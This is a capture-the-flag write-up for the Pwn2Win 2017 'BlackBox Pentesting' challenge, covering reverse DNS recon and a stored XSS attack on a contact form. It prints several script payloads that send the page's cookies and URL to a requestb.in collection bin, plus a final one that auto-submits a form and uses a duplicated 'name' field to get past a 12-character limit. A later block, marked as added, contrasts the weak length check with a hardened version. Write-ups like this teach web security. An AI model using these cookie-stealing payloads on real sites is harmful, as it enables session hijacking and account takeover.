Tags: blackbox xss pentesting 

Rating: 5.0

# BlackBox Pentesting

```
Our agents found a BSC server which is used to contact one of the Corp's sysadmins. We managed to get his
IP (45.77.146.27), but we still haven't found its domain. After obtaining the domain, we believe it's
possible to exploit their website somehow, and then obtain sensitive data. Use your old school pentesting
skills and you will be rewarded!

dir(search|buster|*) tools NOT needed and NOT allowed!

Id: blackbox_pentesting

Total solves: 4

Score: 420

Categories: Web, Recon
```

For this challenge, the only thing we have is an IP. The description suggests that we should reverse-DNS this IP to get the corresponding domain.

I used [dnstrails.com](http://dnstrails.com/) and it showed me that the domain was `bloodsuckers.world`.
The website consisted of a contact form asking for a name and a message. That was all, nothing else. I tried both SQLi and XSS injection, and it turned out that the message field is XSS-injectable, so I tried to steal the admin's cookies:

```html
<script>
new Image().src="http://requestb.in/XXXX?cookie=" + document.cookie;
</script>
```

(I used [requestb.in](http://requestb.in) the whole challenge)

And the cookies were: `Nice_try!=But_you_need_to_dig_deeper`

Nice, I'm getting trolled :')

So let's dig deeper and exfiltrate more information. I tried both local and session storage, and both were empty. I tried to dump the HTML of the page, and found nothing interesting.
Then I tried to read the URL of the page:

```html
<script>
new Image().src="http://requestb.in/XXXXX?path=" + encodeURI(document.location);
</script>
```

It turned out to be `http://sandbox.bloodsuckers.world/render`!

Oh, it's not the same domain: the cookies I'm reading are those of `sandbox.bloodsuckers.world` and not those of `bloodsuckers.world` (cookies aren't shared between subdomains by default).

This is the point where I struggled the most, until I suddenly realised that not only the message is XSS-injectable, but the username too! And guess what, when you submit the form, it says "Dear XXX, thank you and we will answer you shortly" (or something like that).

So here was the plan:
1) First, submit a message that is going to be rendered in `sandbox.bloodsuckers.world`
2) Use this message to submit the form of `bloodsuckers.world` on behalf of the user, with a name that contains an XSS injection to steal the cookie
3) On the 'Dear XXX' page, the code is executed and the cookies are stolen!

Easy? Not quite. The name is limited to 12 characters (checked both client-side and server-side).
But if you send the `name` field twice, the backend concatenates the two values into one, and only the first one is limited to 12 characters.

With all that, I was ready to craft the ultimate payload:

```html
<script>
var form = document.createElement("form");
form.setAttribute("method", "POST");
form.setAttribute("action", "http://bloodsuckers.world/admin/contact");

var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", "name");
hiddenField.setAttribute("value", "lol");

var hiddenField3 = document.createElement("input");
hiddenField3.setAttribute("type", "hidden");
hiddenField3.setAttribute("name", "name");
hiddenField3.setAttribute("value", '\'; new Image().src="https://requestb.in/XXXXX?cookie=" + document.cookie; //');

var hiddenField2 = document.createElement("input");
hiddenField2.setAttribute("type", "hidden");
hiddenField2.setAttribute("name", "message");
hiddenField2.setAttribute("value", "lol2");

form.appendChild(hiddenField);
form.appendChild(hiddenField2);
form.appendChild(hiddenField3);

document.body.appendChild(form);
form.submit();

</script>
```
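The server-side flaw the payload relies on is a length check applied to each `name` value before the duplicated values are joined, with the result reflected unescaped into the "Dear XXX" page. The following is an added example, not code from the writeup or the challenge, showing that weak check beside a hardened one; `parseForm`, `weakName`, `safeName` and the sample request body are all constructed for illustration.

```javascript
const NAME_MAX = 12; // limit stated in the writeup

// Parse an application/x-www-form-urlencoded body into {key: [values...]},
// keeping every repeated field the way real servers do.
function parseForm(body) {
  const fields = {};
  for (const pair of body.split("&")) {
    if (!pair) continue;
    const [k, v = ""] = pair.split("=");
    const key = decodeURIComponent(k.replace(/\+/g, " "));
    const val = decodeURIComponent(v.replace(/\+/g, " "));
    (fields[key] = fields[key] || []).push(val);
  }
  return fields;
}

// Weak (models the challenge backend): only the first 'name' value is
// length-checked, then all values are concatenated and reflected raw.
// A second 'name' field therefore carries an unlimited, unescaped string.
function weakName(fields) {
  const values = fields.name || [];
  if (values[0] !== undefined && values[0].length > NAME_MAX) return null;
  return values.join("");
}

// Minimal HTML escaping for text inserted into an HTML body.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: refuse repeated fields (parameter pollution), enforce the
// limit on the final value, and escape before it reaches the page.
function safeName(fields) {
  const values = fields.name || [];
  if (values.length !== 1) return null;
  const name = values[0];
  if (name.length === 0 || name.length > NAME_MAX) return null;
  return escapeHtml(name);
}

// Constructed request: a 3-char first name plus an over-long second one.
const sampleBody =
  "name=lol&name=" + encodeURIComponent("<i>" + "A".repeat(20) + "</i>") + "&message=hi";
console.log("weak  :", weakName(parseForm(sampleBody))); // 30-char raw HTML
console.log("safe  :", safeName(parseForm(sampleBody))); // null (rejected)
```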

And the flag was `CTF-BR{D0_y0u_eV3n_5oP?}`

Thank you for reading,

The `Rapace Diabolique`

Original writeup (https://github.com/RapaceDiabolique/ctf_writeup/blob/master/Pwn2Win%20CTF%202017/BlackBox%20Pentesting.md).